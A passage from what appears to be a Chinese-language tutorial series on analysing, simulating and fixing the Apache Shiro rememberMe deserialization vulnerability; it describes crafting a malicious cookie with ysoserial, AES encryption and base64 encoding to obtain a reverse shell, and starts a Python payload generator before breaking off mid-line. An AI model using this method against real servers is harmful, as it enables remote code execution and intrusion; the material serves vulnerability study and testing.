shiro反序列化漏洞模拟攻击
shiro反序列化漏洞分析、模拟攻击及修复(一)
shiro反序列化漏洞分析、模拟攻击及修复(三)
得知cookie的流程后,我们可以根据其处理流程进行恶意请求数据构造,首先使用ysoserial将恶意数据进行序列化,其次将序列化后的数据进行AES加密,然后将AES密文进行BASE64编码,最后得到精心构造的包含恶意请求的rememberMe内容。
这里我们按照前16字节的密钥–>后面加入序列化参数–>AES加密–>base64编码–>发送cookie,在power shell中利用反弹shell的方式模拟恶意请求攻击的过程。
1.首先我们需要产生payload的 ysoserial ,执行下列命令,可以获取到需要的 jar 文件。
2.生成payload的python代码如下
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subproces